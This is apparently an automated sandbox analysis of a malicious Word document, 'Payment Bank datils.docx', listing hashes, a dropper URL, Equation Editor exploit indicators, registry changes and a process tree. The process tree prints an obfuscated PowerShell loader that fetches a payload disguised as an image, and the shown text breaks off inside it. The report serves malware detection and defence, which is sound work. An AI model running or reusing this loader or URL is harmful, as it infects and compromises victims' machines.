7f24742114fe32be839bd4df96c91475a84933da9f180afe4b869c25591f1a65

Analysis

max time kernel
146s
max time network
150s
platform
windows7_x64
resource
win7-20231025-en
resource tags

arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system
submitted
27-11-2023 07:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Payment Bank datils.docx
Size

22KB
MD5

751c33f490f58a8cf08f547a10021ffd
SHA1

69963ab2e390bf35e5ff9a4c94a170f23acdf096
SHA256

7f24742114fe32be839bd4df96c91475a84933da9f180afe4b869c25591f1a65
SHA512

e0ff9d6b7a9eb7130501ea1b1fc0bf5b89e449d64ea9b2ab91fb127f78a48f5676d31f0328a97d97e6bec0ac4c345d7bcd97b3a1e920cd7396f0c9ef93225af9
SSDEEP

384:LP81lPCsZPDPwaPnG6f59UORfqNy4Y0Fivd7ZMM4EUS9rDhCl0mppOOP1+DPJ88m:I1LomfsRYKiAMx9Xg0mp7/Uo

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://uploaddeimagens.com.br/images/004/674/364/original/vbsss.jpg?1700999331

exe.dropper

https://uploaddeimagens.com.br/images/004/674/364/original/vbsss.jpg?1700999331

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
14	2592	EQNEDT32.EXE
16	1524	WScript.exe
18	2672	powershell.exe
20	2672	powershell.exe
22	2672	powershell.exe

Abuses OpenXML format to download file from external location

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2592	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm	WINWORD.EXE

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	16	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1892	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1336	powershell.exe
2672	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeDebugPrivilege	2672	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1892	WINWORD.EXE
1892	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2592 wrote to memory of 1524	2592	EQNEDT32.EXE	30
PID 2592 wrote to memory of 1524	2592	EQNEDT32.EXE	30
PID 2592 wrote to memory of 1524	2592	EQNEDT32.EXE	30
PID 2592 wrote to memory of 1524	2592	EQNEDT32.EXE	30
PID 1892 wrote to memory of 1416	1892	WINWORD.EXE	32
PID 1892 wrote to memory of 1416	1892	WINWORD.EXE	32
PID 1892 wrote to memory of 1416	1892	WINWORD.EXE	32
PID 1892 wrote to memory of 1416	1892	WINWORD.EXE	32
PID 1524 wrote to memory of 1336	1524	WScript.exe	33
PID 1524 wrote to memory of 1336	1524	WScript.exe	33
PID 1524 wrote to memory of 1336	1524	WScript.exe	33
PID 1524 wrote to memory of 1336	1524	WScript.exe	33
PID 1336 wrote to memory of 2672	1336	powershell.exe	36
PID 1336 wrote to memory of 2672	1336	powershell.exe	36
PID 1336 wrote to memory of 2672	1336	powershell.exe	36
PID 1336 wrote to memory of 2672	1336	powershell.exe	36

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Payment Bank datils.docx"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1892
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1416

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2592
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\htmljsshtml.vbs"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
  PID:1524
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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